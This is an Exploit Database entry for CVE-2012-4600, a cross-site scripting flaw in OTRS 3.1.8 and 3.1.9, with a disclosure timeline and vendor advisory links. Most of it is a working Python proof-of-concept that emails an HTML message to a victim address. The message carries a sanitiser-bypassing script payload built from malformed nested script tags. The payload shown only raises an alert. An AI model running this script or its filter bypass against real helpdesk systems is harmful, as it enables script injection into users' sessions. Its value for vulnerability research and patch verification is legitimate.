OTRS Open Technology Real Services 3.1.8/3.1.9 – Cross-Site Scripting

• Exploit Database
• 131 阅读

• 作者： Mike Eduard
  日期： 2012-08-31
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20959/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  #!/usr/bin/python &apos;&apos;&apos; Author: Mike Eduard - Znuny - Enterprise Services for OTRS Product: OTRS Open Technology Real Services Version: 3.1.8 and 3.1.9 Vendor Homepage: http://otrs.org CVE: 2012-4600 Timeline: 22 Aug 2012: Vulnerability reported to vendor and CERT 23 Aug 2012: Response received from CERT and vendor 28 Aug 2012: Update from vendor to have it fixed and released on 30 Aug 2012 30 Aug 2012: Update: vulnerability patched http://www.kb.cert.org/vuls/id/511404 http://znuny.com/#!/advisory/ZSA-2012-02 http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-02/ 31 Aug 2012: Public Disclosure Installed On: Windows Server 2008 R2 & Open SUSE 12.1 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Firefox 14 & Opera 12.01 Injection Point: HTML Email Injection Payload(s): 1: <s<script>...</script><script>...<cript type="text/javascript"> 2: document.write("Hello World!"); 3: alert(&apos;Mike was here!&apos;);; 4: </s<script>//<cript> &apos;&apos;&apos; import smtplib, urllib2   payload = """<s<script>...</script><script>...<cript type="text/javascript"> document.write("Hello World!"); alert(123);; </s<script>//<cript> """   def sendMail(dstemail, frmemail, smtpsrv, username, password): msg= "From: hacker@znuny.local\n" msg += "To: victim@victim.local\n" msg += &apos;Date: Today\r\n&apos; msg += "Subject: Offensive Security\n" msg += "Content-type: text/html\n\n" msg += "XSS" + payload + "\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit()   username = "hacker@znuny.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@znuny.local" smtpsrv= "127.0.0.1"   print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password)